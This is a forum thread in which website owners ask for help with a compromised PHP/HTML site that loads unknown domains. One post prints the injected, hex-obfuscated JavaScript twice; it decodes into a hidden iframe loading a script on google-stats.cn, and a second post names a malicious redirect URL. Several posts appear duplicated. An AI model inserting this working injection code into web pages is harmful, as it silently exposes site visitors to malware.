Website accessing unknown URL
Moderator: General Moderators
Website accessing unknown URL
My website php/mysql is fetching data from unkown urls: example google-stats.cn, googlezet.net..& few more. I did a find through the entire website folder but could not find these URLS. This seem to be very difficult to be solved?
Re: Website accessing unknown URL
Thanks for your reply. At this instance I will not be able to reveal you the URL due to confidentiality agreement with my customer. If you can relate the problem & give me information to identify & resolve issues will be of great help.
This is the only site in the search I could figure out some info.
http://webhelper4u.net/whmembers/sitesl ... alphaA.txt
Thank you again for your reply, I will look forward for your advice.
This is the only site in the search I could figure out some info.
http://webhelper4u.net/whmembers/sitesl ... alphaA.txt
Thank you again for your reply, I will look forward for your advice.
Re: Website accessing unknown URL
This is what the code has created to a index file but this variables are dynamic & get generated on almost any file.
<!-- o --><script type="text/javascript">function jgouxhcixerkio(gqnfvwqckkaxvgg){var xlwqrzxo="";for(mxkoehci=0;mxkoehci<gqnfvwqckkaxvgg.length;mxkoehci+=2){xlwqrzxo+=(String.fromCharCode(parseInt(gqnfvwqckkaxvgg.substr(mxkoehci,2),16)));}document.write(xlwqrzxo);}jgouxhcixerkio("3C696672wqxeru61wqxeru6Dwqxeru65wqxeru20wqxeru737263wqxeru3D22wqxeru68wqxeru747470wqxeru3Awqxeru2F2Fwqxeru676Fwqxeru6Fwqxeru67wqxeru6C652Dwqxeru73wqxeru746174732E636E2F7371wqxeru6Cwqxeru2Fwqxeru69wqxeru6Ewqxeru2Ewqxeru636769wqxeru3Fwqxeru646566wqxeru6175wqxeru6C7422wqxeru206672wqxeru61wqxeru6D65626Fwqxeru72wqxeru6465wqxeru723Dwqxeru22wqxeru30wqxeru222062wqxeru6Fwqxeru7264wqxeru65wqxeru72wqxeru3Dwqxeru2230222077wqxeru69wqxeru6474683Dwqxeru22wqxeru3022206865wqxeru69676874wqxeru3Dwqxeru22wqxeru30wqxeru22wqxeru2073wqxeru74wqxeru79wqxeru6C65wqxeru3Dwqxeru22706Fwqxeru73wqxeru6974wqxeru696Fwqxeru6E3A2061wqxeru62wqxeru736Fwqxeru6C7574653Bwqxeru20wqxeru76wqxeru6973wqxeru6962696Cwqxeru69wqxeru74wqxeru79wqxeru3A20wqxeru68wqxeru69wqxeru6464656E3Bwqxeru20wqxeru64wqxeru69wqxeru73wqxeru706Cwqxeru61wqxeru79wqxeru3A206Ewqxeru6F6E65wqxeru223E3C2Fwqxeru69wqxeru66wqxeru7261wqxeru6D653Ewqxeru".replace(/wqxeru/g, ""));</script><!-- c -->
<!-- o --><script type="text/javascript">function jgouxhcixerkio(gqnfvwqckkaxvgg){var xlwqrzxo="";for(mxkoehci=0;mxkoehci<gqnfvwqckkaxvgg.length;mxkoehci+=2){xlwqrzxo+=(String.fromCharCode(parseInt(gqnfvwqckkaxvgg.substr(mxkoehci,2),16)));}document.write(xlwqrzxo);}jgouxhcixerkio("3C696672wqxeru61wqxeru6Dwqxeru65wqxeru20wqxeru737263wqxeru3D22wqxeru68wqxeru747470wqxeru3Awqxeru2F2Fwqxeru676Fwqxeru6Fwqxeru67wqxeru6C652Dwqxeru73wqxeru746174732E636E2F7371wqxeru6Cwqxeru2Fwqxeru69wqxeru6Ewqxeru2Ewqxeru636769wqxeru3Fwqxeru646566wqxeru6175wqxeru6C7422wqxeru206672wqxeru61wqxeru6D65626Fwqxeru72wqxeru6465wqxeru723Dwqxeru22wqxeru30wqxeru222062wqxeru6Fwqxeru7264wqxeru65wqxeru72wqxeru3Dwqxeru2230222077wqxeru69wqxeru6474683Dwqxeru22wqxeru3022206865wqxeru69676874wqxeru3Dwqxeru22wqxeru30wqxeru22wqxeru2073wqxeru74wqxeru79wqxeru6C65wqxeru3Dwqxeru22706Fwqxeru73wqxeru6974wqxeru696Fwqxeru6E3A2061wqxeru62wqxeru736Fwqxeru6C7574653Bwqxeru20wqxeru76wqxeru6973wqxeru6962696Cwqxeru69wqxeru74wqxeru79wqxeru3A20wqxeru68wqxeru69wqxeru6464656E3Bwqxeru20wqxeru64wqxeru69wqxeru73wqxeru706Cwqxeru61wqxeru79wqxeru3A206Ewqxeru6F6E65wqxeru223E3C2Fwqxeru69wqxeru66wqxeru7261wqxeru6D653Ewqxeru".replace(/wqxeru/g, ""));</script><!-- c -->
Re: Website accessing unknown URL
I have experinced the same thing!
On one of my clients FTP account, in a index.html file the function "function jgouxhcixerkio" was inserted
and the jpg image loaded on that page was edited with a url to
"[http://srq3h.com/center/movies/images/luk/index.php]" witch I suppose will load even more crap if you go there...
When I searched the site I found additional pages that had the
"function jgouxhcixerkio" or similar as function pkjrwddej(nhehhbxp) etc.
I have asked the web hotel to change the password to the FTP account,
made the index, and jpg-file not editable (write protected),
scanned my computer for viruses etc and cleaned it! --> several cockies deleted.
Now I hope this will solve the problem if any 'ganster' got hold of the ftp_account login.
any one else experienced this?
On one of my clients FTP account, in a index.html file the function "function jgouxhcixerkio" was inserted
and the jpg image loaded on that page was edited with a url to
"[http://srq3h.com/center/movies/images/luk/index.php]" witch I suppose will load even more crap if you go there...
When I searched the site I found additional pages that had the
"function jgouxhcixerkio" or similar as function pkjrwddej(nhehhbxp) etc.
I have asked the web hotel to change the password to the FTP account,
made the index, and jpg-file not editable (write protected),
scanned my computer for viruses etc and cleaned it! --> several cockies deleted.
Now I hope this will solve the problem if any 'ganster' got hold of the ftp_account login.
any one else experienced this?
Re: Website accessing unknown URL
What we have done as a immediate fix is we changed all the common file names ex: index, config, login..etc. This has solved the issue but I am not sure if this has also infected other files.
I will also change the ftp access pass. How these kind of attacks can be prevented in the future. Do you know any software which can scan the website(offline) for exploits?
Thanks Again! Great Help!
Manis
I will also change the ftp access pass. How these kind of attacks can be prevented in the future. Do you know any software which can scan the website(offline) for exploits?
Thanks Again! Great Help!
Manis
Re: Website accessing unknown URL
This sounds like a "local" problem - it happens that your machine (that is used to FTP to the site) has some malware on it, which has sniffed the FTP password and injected the code. Reupload your site from a clean machine and see if it helps.
Re: Website accessing unknown URL
This might be true. I have cleaned the system & uploaded the code again. I am waiting to see any changes.
Is there any tool/software which can manage security? Whatsover infection it will clean the code on the local?
Thanks!
Manis
Is there any tool/software which can manage security? Whatsover infection it will clean the code on the local?
Thanks!
Manis